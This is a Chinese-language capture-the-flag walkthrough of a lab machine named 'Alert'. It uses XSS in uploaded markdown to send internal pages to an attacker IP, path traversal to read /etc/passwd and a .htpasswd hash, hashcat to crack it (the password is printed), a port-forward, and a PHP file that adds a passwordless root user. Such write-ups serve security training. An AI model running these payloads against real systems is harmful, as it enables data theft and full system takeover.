image-20250319162201412

image-20250319162151491

dirsearch

image-20250319163410640

image-20250319163455574

打开网站 是一个文件上传

image-20250319162333843

只能传markdown文件

尝试xss

image-20250319163054817

image-20250319163110813

尝试访问/messages.php文件并将响应结果传输回攻击机

1
2
3
4
5
<script>
fetch("http://alert.htb/messages.php")
.then(response => response.text())
.then(data => {fetch("http://10.172.29.1:4444/?file_content=" + encodeURIComponent(data));});
</script>

image-20250319163847673

通过sharemarkdown获得路径

1
http://alert.htb/visualizer.php?link_share=67da848835c9b5.19283533.md

发送给网站管理员

image-20250319164745021

bot点击后弹回内容

image-20250319164832735

url解密得到

1
<h1>Messages</h1><ul><li><a href='messages.php?file=2024-03-10_15-48-34.txt'>2024-03-10_15-48-34.txt</a></li></ul>

可以看到接受一个file参数

尝试读取/etc/passwd

1
2
3
4
5
<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../../../etc/passwd")
.then(response => response.text())
.then(data => {fetch("http://10.10.16.40:1234/?file_content=" + encodeURIComponent(data));});
</script>

同理

image-20250319165921693

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
albert:x:1000:1000:albert:/home/albert:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
david:x:1001:1002:,,,:/home/david:/bin/bash
</pre>

读取/etc/apache2/sites-available/000-default.conf得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<pre><VirtualHost *:80>
    ServerName alert.htb

    DocumentRoot /var/www/alert.htb

    <Directory /var/www/alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>

    RewriteEngine On
    RewriteCond %{HTTP_HOST} !^alert\.htb$
    RewriteCond %{HTTP_HOST} !^$
    RewriteRule ^/?(.*)$ http://alert.htb/$1 [R=301,L]

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

<VirtualHost *:80>
    ServerName statistics.alert.htb

    DocumentRoot /var/www/statistics.alert.htb

    <Directory /var/www/statistics.alert.htb>
        Options FollowSymLinks MultiViews
        AllowOverride All
    </Directory>

    <Directory /var/www/statistics.alert.htb>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride All
        AuthType Basic
        AuthName "Restricted Area"
        AuthUserFile /var/www/statistics.alert.htb/.htpasswd
        Require valid-user
    </Directory>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

</pre>

看到/var/www/statistics.alert.htb/.htpasswd,通常包含用户名及其对应的加密密码

image-20250319170419543

1
2
<pre>albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
</pre>

爆一下密码

1
hashcat -m 1600 -a 0 hash.txt rockyou.txt

得到

1
2
albert
manchesterunited

image-20250319171115014

ssh连接 拿到user.txt

image-20250319172455563

suid没有可以提权的东西

查看内部网络连接 发现8080端口只能本地访问

image-20250319172433176

靶机向攻击机发起反向代理

1
./gost -L=tcp://:2222/127.0.0.1:8080

攻击机

1
gost -L=tcp://:8080/10.10.11.44:2222

image-20250319193517146

查看网页标题

image-20250319193724047

查看文件位置

1
ps -aux|grep 8080

image-20250319193826204

image-20250319193900603

发现monitors允许写入

可以在其目录中用php执行系统命令

1
echo '<?php exec("echo yiyi::0:0:x0da6h:/root:/bin/bash >> /etc/passwd"); ?>' > yiyi.php

访问[localhost:8080/monitors/yiyi.php](http://localhost:8080/monitors/yiyi.php)

image-20250319194356812

image-20250319194427526